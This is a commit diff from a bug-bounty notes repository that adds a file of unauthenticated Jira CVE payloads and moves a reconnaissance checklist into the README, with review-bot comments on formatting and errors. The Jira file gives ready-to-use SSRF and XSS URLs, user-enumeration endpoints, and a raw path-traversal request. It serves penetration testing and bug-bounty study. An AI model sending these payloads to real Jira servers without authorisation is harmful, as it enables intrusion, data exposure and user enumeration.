  • Grouping, Added Jira CVE, Updated Readme

  • MD15 committed 3 years ago
    e5fe7019
    1 parent 191cab13
  • Bypass 2FA.md Bypass/Bypass 2FA.md
    Content is identical
  • Bypass 403.md Bypass/Bypass 403.md
    Content is identical
  • Bypass CSRF.md Bypass/Bypass CSRF.md
    Content is identical
  • Bypass Captcha.md Bypass/Bypass Captcha.md
    Content is identical
  • Bypass File Upload.md Bypass/Bypass File Upload.md
    Content is identical
  • Bypass Rate Limit.md Bypass/Bypass Rate Limit.md
    Content is identical
    Misc/Recon.MD
    1  -# Bug-Bounty-Recon
    2  - 
    3  -## Small Scope
    4  -### Only Specific URLs are part of Scope. This usually includes staging/dev/testing or single URLs. like: app.harshbothra.tech
    5  -- [x] Directory Enumeration
    6  -- [x] Technology Fingerprinting
    7  -- [x] Port Scanning
    8  -- [x] Parameter Fuzzing
    9  -- [x] Wayback History
    10  -- [x] Known Vulnerabilities
    11  -- [x] Hardcoded Information in JavaScript
    12  -- [x] Domain Specific GitHub & Google Dorking
    13  -- [x] Broken Link Hijacking
    14  -- [x] Data Breach Analysis
    15  -- [x] Misconfigured Cloud Storage
    16  -## Medium Scope
    17  -### Usually the scope is wild card scope where all the subdomains are part of scope. like: Scope: *.harshbothra.tech
    18  -- [x] Subdomain Enumeration
    19  -- [x] Subdomain Takeover
    20  -- [x] Probing & Technology Fingerprinting
    21  -- [x] Port Scanning
    22  -- [x] Known Vulnerabilities
    23  -- [x] Template Based Scanning (Nuclei/Jeales)
    24  -- [x] Misconfigured Cloud Storage
    25  -- [x] Broken Link Hijacking
    26  -- [x] Directory Enumeration
    27  -- [x] Hardcoded Information in JavaScript
    28  -- [x] GitHub Reconnaissance
    29  -- [x] Google Dorking
    30  -- [x] Data Breach Analysis
    31  -- [x] Parameter Fuzzing
    32  -- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
    33  -- [x] IP Range Enumeration (If in Scope)
    34  -- [x] Wayback History
    35  -- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
    36  -- [x] Heartbleed Scanning
    37  -- [x] General Security Misconfiguration Scanning
    38  -## Large Scope
    39  -### Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization.
    40  -- [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.) ​
    41  -- [x] Subsidiary & Acquisition Enumeration (Depth – Max)​
    42  -- [x] Reverse Lookup
    43  -- [x] ASN & IP Space Enumeration and Service Identification​
    44  -- [x] Subdomain Enumeration
    45  -- [x] Subdomain Takeover
    46  -- [x] Probing & Technology Fingerprinting
    47  -- [x] Port Scanning
    48  -- [x] Known Vulnerabilities
    49  -- [x] Template Based Scanning (Nuclei/Jeales)
    50  -- [x] Misconfigured Cloud Storage
    51  -- [x] Broken Link Hijacking
    52  -- [x] Directory Enumeration
    53  -- [x] Hardcoded Information in JavaScript
    54  -- [x] GitHub Reconnaissance
    55  -- [x] Google Dorking
    56  -- [x] Data Breach Analysis
    57  -- [x] Parameter Fuzzing
    58  -- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
    59  -- [x] IP Range Enumeration (If in Scope)
    60  -- [x] Wayback History
    61  -- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
    62  -- [x] Heartbleed Scanning
    63  -- [x] General Security Misconfiguration Scanning
    64  -- [x] And any possible Recon Vector (Network/Web) can be applied.​
    65  - 
    66  -Source: [Link](https://www.xmind.net/m/hKKexj/)
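Review bot: the concrete scope examples on the deleted `###` lines (`like: app.harshbothra.tech` and `Scope: *.harshbothra.tech`) are dropped rather than carried along with the checklist; if this content is being moved into another file, keep those examples, since they are the only illustration of what each scope level means in practice, and keep the `Source: [Link](https://www.xmind.net/m/hKKexj/)` attribution next to the moved list. While the list is being moved, also fix `Template Based Scanning (Nuclei/Jeales)` (the tool is Jaeles, misspelled in both the Medium and Large Scope lists) and the stray trailing zero-width characters on the `Tracking & Tracing`, `Subsidiary & Acquisition`, `ASN & IP Space` and `And any possible Recon Vector` items, which copy into other files unnoticed.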
    Misc/Unauthenticated Jira CVE.md
     1 +# Unauthenticated Jira CVEs
     2 +1. CVE-2017-9506 (SSRF)
     3 +```
     4 +https://<JIRA_URL>/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>
     5 +```
     6 +2. CVE-2018-20824 (XSS)
     7 +```
     8 +https://<JIRA_URL>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
     9 +```
     10 +3. CVE-2019-8451 (SSRF)
     11 +```
     12 +https://<JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<HOST_NAME>:[email protected]
     13 +```
     14 +4. CVE-2019-8449 (User Information Disclosure)
     15 +```
     16 +https://<JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
     17 +```
     18 +5. CVE-2019-8442 (Sensitive Information Disclosure)
     19 +```
     20 +https://<JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
     21 +```
     22 +6. CVE-2019-3403 (User Enumeration)
     23 +```
     24 +https://<JIRA_URL>/rest/api/2/user/picker?query=<USERNAME_HERE>
     25 +```
     26 +7. CVE-2020-14181 (User Enumeration)
     27 +```
     28 +https://<JIRA_URL>/secure/ViewUserHover.jspa?username=<USERNAME>
     29 +```
     30 +8. CVE-2020-14178 (Project Key Enumeration)
     31 +```
     32 +https://<JIRA_URL>/browse.<PROJECT_KEY>
     33 +```
     34 +9. CVE-2020-14179 (Information Disclosure)
     35 +```
     36 +https://<JIRA_URL>/secure/QueryComponent!Default.jspa
     37 +```
     38 +10. CVE-2019-11581 (Template Injection)
     39 +```
     40 +<JIRA_URL>/secure/ContactAdministrators!default.jspa
     41 + 
     42 +* Try the SSTI Payloads
     43 +```
     44 + 
     45 +11. CVE-2019-3396 (Path Traversal)
     46 +```
     47 +POST /rest/tinymce/1/macro/preview HTTP/1.1
     48 +Host: {{Hostname}}
     49 +Accept: */*
     50 +Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
     51 +Referer: {{Hostname}}
     52 +Content-Length: 168
     53 +Connection: close
     54 + 
     55 +{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
     56 + 
     57 +*Try above request with the Jira target
     58 +```
     59 +12. CVE-2019-3402 (XSS)
     60 +```
     61 +https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
     62 +```
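Review bot: item 11 does not belong under a heading of "Unauthenticated Jira CVEs": the request to `/rest/tinymce/1/macro/preview` with a `widget` macro and a `_template` parameter is the Confluence Server Widget Connector vector that CVE-2019-3396 describes, so the note `*Try above request with the Jira target` is misleading; move the entry to a Confluence file or label it as Confluence. In the same block, `Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 ...` is two headers run onto one line and `Content-Length: 168` should equal the actual byte length of the JSON body, otherwise the request will not parse as intended when copied. Item 10 places the explanatory line `* Try the SSTI Payloads` inside the code fence and omits the `https://` prefix used everywhere else; item 3 ends in `[email protected]`, a mangled placeholder that should read as a full placeholder such as `<CALLBACK_HOST>`. Each entry would also be more useful to defenders with a link to the Atlassian advisory and the version that fixes it, so readers can check whether an instance is actually affected before testing.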
    README.md
    1  -# AllAboutBugBounty
    2  -All about bug websites (bypasses, payloads, and etc)
     1 +# All about bug bounty
     2 + 
     3 +## List
     4 +- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Account%20Takeover.md)
     5 +- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
     6 +- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
     7 +- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
     8 +- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
     9 +- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
     10 +- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Password%20Reset%20Flaws.md)
     11 + 
     12 +## List Bypass
     13 +- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
     14 +- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
     15 +- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
     16 +- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
     17 +- [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md)
     18 +- [Bypass Rate Limit](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md)
     19 + 
     20 +## List CMS
     21 +- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CMS/WordPress.md)
     22 + 
     23 +## List Framework
     24 +- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md)
     25 +- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.MD)
     26 + 
     27 +## Miscellaneous
     28 +- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
     29 + 
     30 +## Reconnaissance
     31 +* ### __Small Scope__
     32 +Only Specific URLs are part of Scope. This usually includes staging/dev/testing or single URLs.
     33 +- [x] Directory Enumeration
     34 +- [x] Technology Fingerprinting
     35 +- [x] Port Scanning
     36 +- [x] Parameter Fuzzing
     37 +- [x] Wayback History
     38 +- [x] Known Vulnerabilities
     39 +- [x] Hardcoded Information in JavaScript
     40 +- [x] Domain Specific GitHub & Google Dorking
     41 +- [x] Broken Link Hijacking
     42 +- [x] Data Breach Analysis
     43 +- [x] Misconfigured Cloud Storage
     44 +* ### __Medium Scope__
     45 +Usually the scope is wild card scope where all the subdomains are part of scope
     46 +- [x] Subdomain Enumeration
     47 +- [x] Subdomain Takeover
     48 +- [x] Probing & Technology Fingerprinting
     49 +- [x] Port Scanning
     50 +- [x] Known Vulnerabilities
     51 +- [x] Template Based Scanning (Nuclei/Jeales)
     52 +- [x] Misconfigured Cloud Storage
     53 +- [x] Broken Link Hijacking
     54 +- [x] Directory Enumeration
     55 +- [x] Hardcoded Information in JavaScript
     56 +- [x] GitHub Reconnaissance
     57 +- [x] Google Dorking
     58 +- [x] Data Breach Analysis
     59 +- [x] Parameter Fuzzing
     60 +- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
     61 +- [x] IP Range Enumeration (If in Scope)
     62 +- [x] Wayback History
     63 +- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
     64 +- [x] Heartbleed Scanning
     65 +- [x] General Security Misconfiguration Scanning
     66 +* ### __Large Scope__
     67 +Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization.
     68 +- [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.) ​
     69 +- [x] Subsidiary & Acquisition Enumeration (Depth – Max)​
     70 +- [x] Reverse Lookup
     71 +- [x] ASN & IP Space Enumeration and Service Identification​
     72 +- [x] Subdomain Enumeration
     73 +- [x] Subdomain Takeover
     74 +- [x] Probing & Technology Fingerprinting
     75 +- [x] Port Scanning
     76 +- [x] Known Vulnerabilities
     77 +- [x] Template Based Scanning (Nuclei/Jeales)
     78 +- [x] Misconfigured Cloud Storage
     79 +- [x] Broken Link Hijacking
     80 +- [x] Directory Enumeration
     81 +- [x] Hardcoded Information in JavaScript
     82 +- [x] GitHub Reconnaissance
     83 +- [x] Google Dorking
     84 +- [x] Data Breach Analysis
     85 +- [x] Parameter Fuzzing
     86 +- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
     87 +- [x] IP Range Enumeration (If in Scope)
     88 +- [x] Wayback History
     89 +- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
     90 +- [x] Heartbleed Scanning
     91 +- [x] General Security Misconfiguration Scanning
     92 +- [x] And any possible Recon Vector (Network/Web) can be applied.​
    3 93   
     94 +Source: [Link](https://www.xmind.net/m/hKKexj/)
     95 + 
     96 +## Coming Soon!
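Review bot: the `Exposed Source Code` entry links to `Denial%20Of%20Service.md`, which is the same target as the `Denial of Service (DoS)` entry above it and looks like a copy-paste error; point it at the Exposed Source Code file instead. Also: `Framework/Zend.MD` uses an uppercase extension while every other link uses `.md`, which breaks on a case-sensitive host if the file is later renamed; the `* ### __Small Scope__` pattern nests a heading inside a bullet and renders inconsistently, so a plain `### Small Scope` matches the rest of the README; the checklist moved in from `Misc/Recon.MD` drops the `like: app.harshbothra.tech` and `*.harshbothra.tech` scope examples that the original carried, and repeats the `Nuclei/Jeales` misspelling (the tool is Jaeles); and `## Coming Soon!` is an empty trailing heading that should either get content or be left out until it has some.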